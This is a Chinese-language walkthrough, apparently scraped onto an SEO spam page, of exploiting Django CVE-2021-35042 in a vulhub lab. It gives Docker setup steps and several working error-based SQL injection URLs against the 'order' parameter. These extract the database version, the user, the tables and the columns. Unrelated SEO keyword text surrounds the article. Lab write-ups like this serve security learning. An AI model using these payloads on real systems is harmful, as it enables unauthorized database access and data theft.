当前位置: 首页 > news >正文

凡客网站做SEO能被收录吗汕头百度seo公司

凡客网站做SEO能被收录吗,汕头百度seo公司,中铁建设集团网站,有了域名如何做网站什么是 Django 框架 Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来&#x…

什么是 Django 框架

Django 是一个用 Python 编写的 Web 应用程序框架。它提供了许多工具和库,使得开发 Web 应用程序变得更加容易和高效。Django 遵循了“MTV”(模型-模板-视图)的设计模式,将应用程序的不同组件分离开来,使得开发人员可以更加专注于应用程序的不同方面。Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。


目录:

什么是 Django 框架

开启 漏洞 靶场:

(1)查看目录:

(2)启用 vulhub 漏洞:

(3)进行浏览:主机的 8000 端口.

进行 漏洞 测试:

(1)寻找 URL 有输入点的地方就行:

(2)构造报错注入进行攻击获取数据:(查询根目录信息)

(3)构造报错注入进行攻击获取数据:(查询数据库版本信息)

(4)构造报错注入进行攻击获取数据:(查当前用户)

(5)构造报错注入进行攻击获取数据:(查当前数据库)

(6)构造报错注入进行攻击获取数据:(查表)

(7)构造报错注入进行攻击获取数据:(查字段)


开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(1)查看目录:

(1)cd vulhub(2)ls

​ 


(2)启用 vulhub 漏洞:

(1)cd django             // 切换到对应的漏洞目录.(2)cd CVE-2021-35042              // 切换到对应的漏洞版本.(3)docker-compose build           // 建立容器(4)docker-compose up -d           // 启用漏洞环境.(5)docker ps                      // 查看环境运行状态

​ 


(3)进行浏览:主机的 8000 端口.


进行 漏洞 测试:

(1)怎么测试框架类型.(浏览器安装插件检测 Wappalyzer )


(2)寻找 URL 有输入点的地方就行:

例如:http://172.16.10.19:8000//vuln/?order=后面就是写SQL语句的查询.


(3)构造报错注入进行攻击获取数据:(查询根目录信息)

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23


(4)构造报错注入进行攻击获取数据:(查询数据库版本信息)

/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23


(5)构造报错注入进行攻击获取数据:(查当前用户)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20user%28%29%29%29,1%29%23


(6)构造报错注入进行攻击获取数据:(查当前数据库

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20database%28%29%29%29,1%29%23


(7)构造报错注入进行攻击获取数据:(查表

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29,1%29%23


(8)构造报错注入进行攻击获取数据:(查字段)

http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,concat%280x5c,%28select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1%29,0x5c%29,1%29%23

   

http://www.khdw.cn/news/21929.html

相关文章:

  • 一流的盘锦网站建设网站seo属于什么专业
  • wordpress+HTML5游戏宁波网络推广优化公司
  • 仿360电影网站源码永久免费国外域名注册
  • 全面的手机网站建设郑州网络营销公司有哪些
  • 网络系统工程设计是干什么的什么是sem和seo
  • 软件技术服务包括哪些内容优化建站
  • 服务网站建设推广网站建立具体步骤是
  • 宣武富阳网站建设互联网怎么打广告推广
  • 做自媒体都有什么网站seo优化软件
  • 哪个网站做服装批发比较好培训机构网站模板
  • 未来网站建设想法2023年8月份新冠
  • 网站后台难做吗在线建站模板
  • 网站内地图位置怎么做杭州网站seo推广软件
  • 简单大气网站欣赏万网域名交易
  • 广州微信网站设计制作重庆网站seo搜索引擎优化
  • 网站项目策划书内容模板百度文库官网登录入口
  • 班级网站设计报告 dreamwaverseo网站推广助理
  • 做网站编程在程序北京网站外包
  • 哈尔滨微网站建设营销软文写作
  • 莱芜招聘的网站优秀网站seo报价
  • 网站开发 模块营销战略
  • 品牌企业网站建设公司价格营销广告文案
  • 那个网站专门做二手衣服西安seo霸屏
  • 网站收录提交入口网址h5下一页
  • 网站制作模版搜索最多的关键词的排名
  • 怎么把网站地图上传最新实时新闻
  • 邮轮哪个网站是可以做特价进入百度知道首页
  • 水利部建设项目水资源论证网站云南seo网站关键词优化软件
  • 做软件的网站热门关键词
  • 前端网页开发宁波seo关键词